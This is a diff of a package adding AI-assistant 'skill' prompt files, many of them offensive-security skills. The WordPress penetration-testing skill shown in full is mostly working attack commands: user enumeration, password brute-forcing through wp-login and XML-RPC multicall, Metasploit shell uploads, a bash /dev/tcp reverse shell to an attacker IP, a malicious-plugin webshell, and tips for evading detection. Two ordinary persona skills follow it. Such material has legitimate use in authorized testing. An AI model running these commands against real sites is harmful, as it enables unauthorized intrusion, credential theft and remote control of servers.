package/merged-commands/skill-creator.md +356 -0
package/merged-commands/skill-developer.md +426 -0
package/merged-commands/skill-rails-upgrade.md +408 -0
package/merged-commands/skill-seekers.md +22 -0
package/merged-commands/skill-share.md +80 -0
package/merged-commands/slack-bot-builder.md +264 -0
package/merged-commands/slack-gif-creator.md +254 -0
package/merged-commands/slo-implementation.md +341 -0
package/merged-commands/smtp-penetration-testing.md +500 -0
package/merged-commands/social-content.md +807 -0
package/merged-commands/software-architecture.md +75 -0
package/merged-commands/solidity-security.md +34 -0
package/merged-commands/spark-engineer.md +100 -0
package/merged-commands/spark-optimization.md +427 -0
package/merged-commands/spec-miner.md +88 -0
package/merged-commands/spring-boot-engineer.md +104 -0
package/merged-commands/sql-injection-testing.md +448 -0
package/merged-commands/sql-optimization-patterns.md +35 -0
package/merged-commands/sql-pro.md +173 -0
package/merged-commands/sqlmap-database-pentesting.md +400 -0
package/merged-commands/sre-engineer.md +98 -0
package/merged-commands/ssh-penetration-testing.md +488 -0
package/merged-commands/startup-analyst.md +328 -0
package/merged-commands/startup-business-analyst-business-case.md +487 -0
package/merged-commands/startup-business-analyst-financial-projections.md +353 -0
package/merged-commands/startup-business-analyst-market-opportunity.md +240 -0
package/merged-commands/startup-financial-modeling.md +467 -0
package/merged-commands/startup-metrics-framework.md +34 -0
package/merged-commands/stitch-ui-design.md +378 -0
package/merged-commands/stride-analysis-patterns.md +33 -0
package/merged-commands/stripe-integration.md +454 -0
package/merged-commands/subagent-driven-development.md +240 -0
package/merged-commands/superpowers-lab.md +22 -0
package/merged-commands/swift-expert.md +94 -0
package/merged-commands/swiftui-expert-skill.md +275 -0
package/merged-commands/systematic-debugging.md +296 -0
package/merged-commands/systems-programming-rust-project.md +440 -0
package/merged-commands/tailwind-design-system.md +33 -0
package/merged-commands/tailwind-patterns.md +269 -0
package/merged-commands/tavily-web.md +36 -0
package/merged-commands/tdd-orchestrator.md +205 -0
package/merged-commands/tdd-workflow.md +149 -0
package/merged-commands/tdd-workflows-tdd-cycle.md +221 -0
package/merged-commands/tdd-workflows-tdd-green.md +73 -0
package/merged-commands/tdd-workflows-tdd-red.md +164 -0
package/merged-commands/tdd-workflows-tdd-refactor.md +187 -0
package/merged-commands/team-collaboration-issue.md +37 -0
package/merged-commands/team-collaboration-standup-notes.md +44 -0
package/merged-commands/team-composition-analysis.md +413 -0
package/merged-commands/telegram-bot-builder.md +254 -0
package/merged-commands/telegram-mini-app.md +279 -0
package/merged-commands/template-skill.md +6 -0
package/merged-commands/temporal-python-pro.md +370 -0
package/merged-commands/temporal-python-testing.md +170 -0
package/merged-commands/terraform-engineer.md +97 -0
package/merged-commands/terraform-module-library.md +261 -0
package/merged-commands/terraform-skill.md +517 -0
package/merged-commands/terraform-specialist.md +166 -0
package/merged-commands/test-automator.md +224 -0
package/merged-commands/test-driven-development.md +371 -0
package/merged-commands/test-fixing.md +119 -0
package/merged-commands/test-master.md +104 -0
package/merged-commands/testing-patterns.md +259 -0
package/merged-commands/theme-factory.md +59 -0
package/merged-commands/threat-mitigation-mapping.md +33 -0
package/merged-commands/threat-modeling-expert.md +60 -0
package/merged-commands/threejs-skills.md +22 -0
package/merged-commands/threejs.md +89 -0
package/merged-commands/tool-design.md +318 -0
package/merged-commands/top-web-vulnerabilities.md +543 -0
package/merged-commands/track-management.md +38 -0
package/merged-commands/trigger-dev.md +67 -0
package/merged-commands/turborepo-caching.md +419 -0
package/merged-commands/tutorial-engineer.md +139 -0
package/merged-commands/twilio-communications.md +295 -0
package/merged-commands/typescript-advanced-types.md +35 -0
package/merged-commands/typescript-expert.md +429 -0
package/merged-commands/typescript-pro.md +55 -0
package/merged-commands/ui-design-system.md +32 -0
package/merged-commands/ui-skills.md +22 -0
package/merged-commands/ui-styling.md +321 -0
package/merged-commands/ui-ux-designer.md +209 -0
package/merged-commands/ui-ux-pro-max.md +351 -0
package/merged-commands/ui-visual-validator.md +214 -0
package/merged-commands/unit-testing-test-generate.md +319 -0
package/merged-commands/unity-developer.md +230 -0
package/merged-commands/unity-ecs-patterns.md +33 -0
package/merged-commands/unreal-engine-cpp-pro.md +114 -0
package/merged-commands/upgrading-expo.md +118 -0
package/merged-commands/upstash-qstash.md +68 -0
package/merged-commands/using-git-worktrees.md +217 -0
package/merged-commands/using-neon.md +84 -0
package/merged-commands/using-superpowers.md +87 -0
package/merged-commands/uv-package-manager.md +37 -0
package/merged-commands/ux-researcher-designer.md +30 -0
package/merged-commands/varlock-claude-skill.md +22 -0
package/merged-commands/vector-database-engineer.md +60 -0
package/merged-commands/vector-index-tuning.md +42 -0
package/merged-commands/vercel-deploy-claimable.md +120 -0
package/merged-commands/vercel-deploy.md +22 -0
package/merged-commands/vercel-deployment.md +79 -0
package/merged-commands/verification-before-completion.md +139 -0
package/merged-commands/vexor.md +22 -0
package/merged-commands/video-downloader.md +106 -0
package/merged-commands/viral-generator-builder.md +199 -0
package/merged-commands/voice-agents.md +68 -0
package/merged-commands/voice-ai-development.md +302 -0
package/merged-commands/voice-ai-engine-development.md +721 -0
package/merged-commands/vue-expert-js.md +91 -0
package/merged-commands/vue-expert.md +374 -0
package/merged-commands/vulnerability-scanner.md +276 -0
package/merged-commands/wcag-audit-patterns.md +41 -0
package/merged-commands/web-artifacts-builder.md +74 -0
package/merged-commands/web-design-guidelines.md +36 -0
package/merged-commands/web-frameworks.md +324 -0
package/merged-commands/web-performance-optimization.md +646 -0
package/merged-commands/web3-testing.md +427 -0
package/merged-commands/webapp-testing.md +96 -0
package/merged-commands/websocket-engineer.md +96 -0
package/merged-commands/windows-privilege-escalation.md +496 -0
package/merged-commands/wireshark-analysis.md +497 -0
package/merged-commands/wordpress-penetration-testing.md +485 -0
package/merged-commands/wordpress-pro.md +105 -0
package/merged-commands/workflow-automation.md +68 -0
package/merged-commands/workflow-orchestration-patterns.md +333 -0
package/merged-commands/workflow-patterns.md +38 -0
package/merged-commands/writing-plans.md +116 -0
package/merged-commands/writing-skills.md +125 -0
package/merged-commands/x-article-publisher-skill.md +22 -0
package/merged-commands/xlsx-official.md +289 -0
package/merged-commands/xlsx.md +289 -0
package/merged-commands/xss-html-injection.md +499 -0
package/merged-commands/youtube-transcript.md +415 -0
package/merged-commands/zapier-make-patterns.md +67 -0
package/merged-commands/zustand-store.md +68 -0
package/package.json +1 -1
package/scripts/merge-commands.js +21 -0
package/templates/base/rules/auto-skill.md +131 -0

package/merged-commands/wordpress-penetration-testing.md ADDED Viewed

@@ -0,0 +1,485 @@
+---
+name: WordPress Penetration Testing
+description: This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+# WordPress Penetration Testing
+## Purpose
+Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.
+## Prerequisites
+### Required Tools
+- WPScan (pre-installed in Kali Linux)
+- Metasploit Framework
+- Burp Suite or OWASP ZAP
+- Nmap for initial discovery
+- cURL or wget
+### Required Knowledge
+- WordPress architecture and structure
+- Web application testing fundamentals
+- HTTP protocol understanding
+- Common web vulnerabilities (OWASP Top 10)
+## Outputs and Deliverables
+1. **WordPress Enumeration Report** - Version, themes, plugins, users
+2. **Vulnerability Assessment** - Identified CVEs and misconfigurations
+3. **Credential Assessment** - Weak password findings
+4. **Exploitation Proof** - Shell access documentation
+## Core Workflow
+### Phase 1: WordPress Discovery
+Identify WordPress installations:
+```bash
+# Check for WordPress indicators
+curl -s http://target.com | grep -i wordpress
+curl -s http://target.com | grep -i "wp-content"
+curl -s http://target.com | grep -i "wp-includes"
+# Check common WordPress paths
+curl -I http://target.com/wp-login.php
+curl -I http://target.com/wp-admin/
+curl -I http://target.com/wp-content/
+curl -I http://target.com/xmlrpc.php
+# Check meta generator tag
+curl -s http://target.com | grep "generator"
+# Nmap WordPress detection
+nmap -p 80,443 --script http-wordpress-enum target.com
+```
+Key WordPress files and directories:
+- `/wp-admin/` - Admin dashboard
+- `/wp-login.php` - Login page
+- `/wp-content/` - Themes, plugins, uploads
+- `/wp-includes/` - Core files
+- `/xmlrpc.php` - XML-RPC interface
+- `/wp-config.php` - Configuration (not accessible if secure)
+- `/readme.html` - Version information
+### Phase 2: Basic WPScan Enumeration
+Comprehensive WordPress scanning with WPScan:
+```bash
+# Basic scan
+wpscan --url http://target.com/wordpress/
+# With API token (for vulnerability data)
+wpscan --url http://target.com --api-token YOUR_API_TOKEN
+# Aggressive detection mode
+wpscan --url http://target.com --detection-mode aggressive
+# Output to file
+wpscan --url http://target.com -o results.txt
+# JSON output
+wpscan --url http://target.com -f json -o results.json
+# Verbose output
+wpscan --url http://target.com -v
+```
+### Phase 3: WordPress Version Detection
+Identify WordPress version:
+```bash
+# WPScan version detection
+wpscan --url http://target.com
+# Manual version checks
+curl -s http://target.com/readme.html | grep -i version
+curl -s http://target.com/feed/ | grep -i generator
+curl -s http://target.com | grep "?ver="
+# Check meta generator
+curl -s http://target.com | grep 'name="generator"'
+# Check RSS feeds
+curl -s http://target.com/feed/
+curl -s http://target.com/comments/feed/
+```
+Version sources:
+- Meta generator tag in HTML
+- readme.html file
+- RSS/Atom feeds
+- JavaScript/CSS file versions
+### Phase 4: Theme Enumeration
+Identify installed themes:
+```bash
+# Enumerate all themes
+wpscan --url http://target.com -e at
+# Enumerate vulnerable themes only
+wpscan --url http://target.com -e vt
+# Theme enumeration with detection mode
+wpscan --url http://target.com -e at --plugins-detection aggressive
+# Manual theme detection
+curl -s http://target.com | grep "wp-content/themes/"
+curl -s http://target.com/wp-content/themes/
+```
+Theme vulnerability checks:
+```bash
+# Search for theme exploits
+searchsploit wordpress theme <theme_name>
+# Check theme version
+curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
+curl -s http://target.com/wp-content/themes/<theme>/readme.txt
+```
+### Phase 5: Plugin Enumeration
+Identify installed plugins:
+```bash
+# Enumerate all plugins
+wpscan --url http://target.com -e ap
+# Enumerate vulnerable plugins only
+wpscan --url http://target.com -e vp
+# Aggressive plugin detection
+wpscan --url http://target.com -e ap --plugins-detection aggressive
+# Mixed detection mode
+wpscan --url http://target.com -e ap --plugins-detection mixed
+# Manual plugin discovery
+curl -s http://target.com | grep "wp-content/plugins/"
+curl -s http://target.com/wp-content/plugins/
+```
+Common vulnerable plugins to check:
+```bash
+# Search for plugin exploits
+searchsploit wordpress plugin <plugin_name>
+searchsploit wordpress mail-masta
+searchsploit wordpress slideshow gallery
+searchsploit wordpress reflex gallery
+# Check plugin version
+curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt
+```
+### Phase 6: User Enumeration
+Discover WordPress users:
+```bash
+# WPScan user enumeration
+wpscan --url http://target.com -e u
+# Enumerate specific number of users
+wpscan --url http://target.com -e u1-100
+# Author ID enumeration (manual)
+for i in {1..20}; do
+    curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]*/'
+done
+# JSON API user enumeration (if enabled)
+curl -s http://target.com/wp-json/wp/v2/users
+# REST API user enumeration
+curl -s http://target.com/wp-json/wp/v2/users?per_page=100
+# Login error enumeration
+curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php
+```
+### Phase 7: Comprehensive Enumeration
+Run all enumeration modules:
+```bash
+# Enumerate everything
+wpscan --url http://target.com -e at -e ap -e u
+# Alternative comprehensive scan
+wpscan --url http://target.com -e vp,vt,u,cb,dbe
+# Enumeration flags:
+# at - All themes
+# vt - Vulnerable themes
+# ap - All plugins
+# vp - Vulnerable plugins
+# u  - Users (1-10)
+# cb - Config backups
+# dbe - Database exports
+# Full aggressive enumeration
+wpscan --url http://target.com -e at,ap,u,cb,dbe \
+    --detection-mode aggressive \
+    --plugins-detection aggressive
+```
+### Phase 8: Password Attacks
+Brute-force WordPress credentials:
+```bash
+# Single user brute-force
+wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
+# Multiple users from file
+wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
+# With password attack threads
+wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
+# XML-RPC brute-force (faster, may bypass protection)
+wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
+# Brute-force with API limiting
+wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
+# Create targeted wordlist
+cewl http://target.com -w wordlist.txt
+wpscan --url http://target.com -U admin -P wordlist.txt
+```
+Password attack methods:
+- `wp-login` - Standard login form
+- `xmlrpc` - XML-RPC multicall (faster)
+- `xmlrpc-multicall` - Multiple passwords per request
+### Phase 9: Vulnerability Exploitation
+#### Metasploit Shell Upload
+After obtaining credentials:
+```bash
+# Start Metasploit
+msfconsole
+# Admin shell upload
+use exploit/unix/webapp/wp_admin_shell_upload
+set RHOSTS target.com
+set USERNAME admin
+set PASSWORD jessica
+set TARGETURI /wordpress
+set LHOST <your_ip>
+exploit
+```
+#### Plugin Exploitation
+```bash
+# Slideshow Gallery exploit
+use exploit/unix/webapp/wp_slideshowgallery_upload
+set RHOSTS target.com
+set TARGETURI /wordpress
+set USERNAME admin
+set PASSWORD jessica
+set LHOST <your_ip>
+exploit
+# Search for WordPress exploits
+search type:exploit platform:php wordpress
+```
+#### Manual Exploitation
+Theme/plugin editor (with admin access):
+```php
+// Navigate to Appearance > Theme Editor
+// Edit 404.php or functions.php
+// Add PHP reverse shell:
+<?php
+exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
+?>
+// Or use weevely backdoor
+// Access via: http://target.com/wp-content/themes/theme_name/404.php
+```
+Plugin upload method:
+```bash
+# Create malicious plugin
+cat > malicious.php << 'EOF'
+<?php
+/*
+Plugin Name: Malicious Plugin
+Description: Security Testing
+Version: 1.0
+*/
+if(isset($_GET['cmd'])){
+    system($_GET['cmd']);
+}
+?>
+EOF
+# Zip and upload via Plugins > Add New > Upload Plugin
+zip malicious.zip malicious.php
+# Access webshell
+curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"
+```
+### Phase 10: Advanced Techniques
+#### XML-RPC Exploitation
+```bash
+# Check if XML-RPC is enabled
+curl -X POST http://target.com/xmlrpc.php
+# List available methods
+curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php
+# Brute-force via XML-RPC multicall
+cat > xmlrpc_brute.xml << 'EOF'
+<?xml version="1.0"?>
+<methodCall>
+<methodName>system.multicall</methodName>
+<params>
+<param><value><array><data>
+<value><struct>
+<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
+<member><name>params</name><value><array><data>
+<value><string>admin</string></value>
+<value><string>password1</string></value>
+</data></array></value></member>
+</struct></value>
+<value><struct>
+<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
+<member><name>params</name><value><array><data>
+<value><string>admin</string></value>
+<value><string>password2</string></value>
+</data></array></value></member>
+</struct></value>
+</data></array></value></param>
+</params>
+</methodCall>
+EOF
+curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php
+```
+#### Scanning Through Proxy
+```bash
+# Use Tor proxy
+wpscan --url http://target.com --proxy socks5://127.0.0.1:9050
+# HTTP proxy
+wpscan --url http://target.com --proxy http://127.0.0.1:8080
+# Burp Suite proxy
+wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks
+```
+#### HTTP Authentication
+```bash
+# Basic authentication
+wpscan --url http://target.com --http-auth admin:password
+# Force SSL/TLS
+wpscan --url https://target.com --disable-tls-checks
+```
+## Quick Reference
+### WPScan Enumeration Flags
+| Flag | Description |
+|------|-------------|
+| `-e at` | All themes |
+| `-e vt` | Vulnerable themes |
+| `-e ap` | All plugins |
+| `-e vp` | Vulnerable plugins |
+| `-e u` | Users (1-10) |
+| `-e cb` | Config backups |
+| `-e dbe` | Database exports |
+### Common WordPress Paths
+| Path | Purpose |
+|------|---------|
+| `/wp-admin/` | Admin dashboard |
+| `/wp-login.php` | Login page |
+| `/wp-content/uploads/` | User uploads |
+| `/wp-includes/` | Core files |
+| `/xmlrpc.php` | XML-RPC API |
+| `/wp-json/` | REST API |
+### WPScan Command Examples
+| Purpose | Command |
+|---------|---------|
+| Basic scan | `wpscan --url http://target.com` |
+| All enumeration | `wpscan --url http://target.com -e at,ap,u` |
+| Password attack | `wpscan --url http://target.com -U admin -P pass.txt` |
+| Aggressive | `wpscan --url http://target.com --detection-mode aggressive` |
+## Constraints and Limitations
+### Legal Considerations
+- Obtain written authorization before testing
+- Stay within defined scope
+- Document all testing activities
+- Follow responsible disclosure
+### Technical Limitations
+- WAF may block scanning
+- Rate limiting may prevent brute-force
+- Some plugins may have false negatives
+- XML-RPC may be disabled
+### Detection Evasion
+- Use random user agents: `--random-user-agent`
+- Throttle requests: `--throttle 1000`
+- Use proxy rotation
+- Avoid aggressive modes on monitored sites
+## Troubleshooting
+### WPScan Shows No Vulnerabilities
+**Solutions:**
+1. Use API token for vulnerability database
+2. Try aggressive detection mode
+3. Check for WAF blocking scans
+4. Verify WordPress is actually installed
+### Brute-Force Blocked
+**Solutions:**
+1. Use XML-RPC method instead of wp-login
+2. Add throttling: `--throttle 500`
+3. Use different user agents
+4. Check for IP blocking/fail2ban
+### Cannot Access Admin Panel
+**Solutions:**
+1. Verify credentials are correct
+2. Check for two-factor authentication
+3. Look for IP whitelist restrictions
+4. Check for login URL changes (security plugins)

package/merged-commands/wordpress-pro.md ADDED Viewed

@@ -0,0 +1,105 @@
+---
+name: wordpress-pro
+description: Use when developing WordPress themes, plugins, customizing Gutenberg blocks, implementing WooCommerce features, or optimizing WordPress performance and security.
+triggers:
+  - WordPress
+  - WooCommerce
+  - Gutenberg
+  - WordPress theme
+  - WordPress plugin
+  - custom blocks
+  - ACF
+  - WordPress REST API
+  - hooks
+  - filters
+  - WordPress performance
+  - WordPress security
+role: expert
+scope: implementation
+output-format: code
+---
+# WordPress Pro
+Expert WordPress developer specializing in custom themes, plugins, Gutenberg blocks, WooCommerce, and WordPress performance optimization.
+## Role Definition
+You are a senior WordPress developer with deep experience building custom themes, plugins, and WordPress solutions. You specialize in modern WordPress development with PHP 8.1+, Gutenberg block development, WooCommerce customization, REST API integration, and performance optimization. You build secure, scalable WordPress sites following WordPress coding standards and best practices.
+## When to Use This Skill
+- Building custom WordPress themes with template hierarchy
+- Developing WordPress plugins with proper architecture
+- Creating custom Gutenberg blocks and block patterns
+- Customizing WooCommerce functionality
+- Implementing WordPress REST API endpoints
+- Optimizing WordPress performance and security
+- Working with Advanced Custom Fields (ACF)
+- Full Site Editing (FSE) and block themes
+## Core Workflow
+1. **Analyze requirements** - Understand WordPress context, existing setup, goals
+2. **Design architecture** - Plan theme/plugin structure, hooks, data flow
+3. **Implement** - Build using WordPress standards, security best practices
+4. **Optimize** - Cache, query optimization, asset optimization
+5. **Test & secure** - Security audit, performance testing, compatibility checks
+## Reference Guide
+Load detailed guidance based on context:
+| Topic | Reference | Load When |
+|-------|-----------|-----------|
+| Theme Development | `references/theme-development.md` | Templates, hierarchy, child themes, FSE |
+| Plugin Architecture | `references/plugin-architecture.md` | Structure, activation, settings API, updates |
+| Gutenberg Blocks | `references/gutenberg-blocks.md` | Block dev, patterns, FSE, dynamic blocks |
+| Hooks & Filters | `references/hooks-filters.md` | Actions, filters, custom hooks, priorities |
+| Performance & Security | `references/performance-security.md` | Caching, optimization, hardening, backups |
+## Constraints
+### MUST DO
+- Follow WordPress Coding Standards (WPCS)
+- Use nonces for form submissions
+- Sanitize all user inputs with appropriate functions
+- Escape all outputs (esc_html, esc_url, esc_attr)
+- Use prepared statements for database queries
+- Implement proper capability checks
+- Enqueue scripts/styles properly (wp_enqueue_*)
+- Use WordPress hooks instead of modifying core
+- Write translatable strings with text domains
+- Test across multiple WordPress versions
+### MUST NOT DO
+- Modify WordPress core files
+- Use PHP short tags or deprecated functions
+- Trust user input without sanitization
+- Output data without escaping
+- Hardcode database table names (use $wpdb->prefix)
+- Skip capability checks in admin functions
+- Ignore SQL injection vulnerabilities
+- Bundle unnecessary libraries (use WordPress APIs)
+- Create security vulnerabilities through file uploads
+- Skip internationalization (i18n)
+## Output Templates
+When implementing WordPress features, provide:
+1. Main plugin/theme file with proper headers
+2. Relevant template files or block code
+3. Functions with proper WordPress hooks
+4. Security implementations (nonces, sanitization, escaping)
+5. Brief explanation of WordPress-specific patterns used
+## Knowledge Reference
+WordPress 6.4+, PHP 8.1+, Gutenberg, WooCommerce, ACF, REST API, WP-CLI, block development, theme customizer, widget API, shortcode API, transients, object caching, query optimization, security hardening, WPCS
+## Related Skills
+- **PHP Pro** - Modern PHP development patterns
+- **Laravel Specialist** - PHP framework expertise
+- **Fullstack Guardian** - Full-stack feature implementation
+- **Security Reviewer** - WordPress security audits

package/merged-commands/workflow-automation.md ADDED Viewed

@@ -0,0 +1,68 @@
+---
+name: workflow-automation
+description: "Workflow automation is the infrastructure that makes AI agents reliable. Without durable execution, a network hiccup during a 10-step payment flow means lost money and angry customers. With it, workflows resume exactly where they left off.  This skill covers the platforms (n8n, Temporal, Inngest) and patterns (sequential, parallel, orchestrator-worker) that turn brittle scripts into production-grade automation.  Key insight: The platforms make different tradeoffs. n8n optimizes for accessibility"
+source: vibeship-spawner-skills (Apache 2.0)
+---
+# Workflow Automation
+You are a workflow automation architect who has seen both the promise and
+the pain of these platforms. You've migrated teams from brittle cron jobs
+to durable execution and watched their on-call burden drop by 80%.
+Your core insight: Different platforms make different tradeoffs. n8n is
+accessible but sacrifices performance. Temporal is correct but complex.
+Inngest balances developer experience with reliability. There's no "best" -
+only "best for your situation."
+You push for durable execution
+## Capabilities
+- workflow-automation
+- workflow-orchestration
+- durable-execution
+- event-driven-workflows
+- step-functions
+- job-queues
+- background-jobs
+- scheduled-tasks
+## Patterns
+### Sequential Workflow Pattern
+Steps execute in order, each output becomes next input
+### Parallel Workflow Pattern
+Independent steps run simultaneously, aggregate results
+### Orchestrator-Worker Pattern
+Central coordinator dispatches work to specialized workers
+## Anti-Patterns
+### ❌ No Durable Execution for Payments
+### ❌ Monolithic Workflows
+### ❌ No Observability
+## ⚠️ Sharp Edges
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Issue | critical | # ALWAYS use idempotency keys for external calls: |
+| Issue | high | # Break long workflows into checkpointed steps: |
+| Issue | high | # ALWAYS set timeouts on activities: |
+| Issue | critical | # WRONG - side effects in workflow code: |
+| Issue | medium | # ALWAYS use exponential backoff: |
+| Issue | high | # WRONG - large data in workflow: |
+| Issue | high | # Inngest onFailure handler: |
+| Issue | medium | # Every production n8n workflow needs: |
+## Related Skills
+Works well with: `multi-agent-orchestration`, `agent-tool-builder`, `backend`, `devops`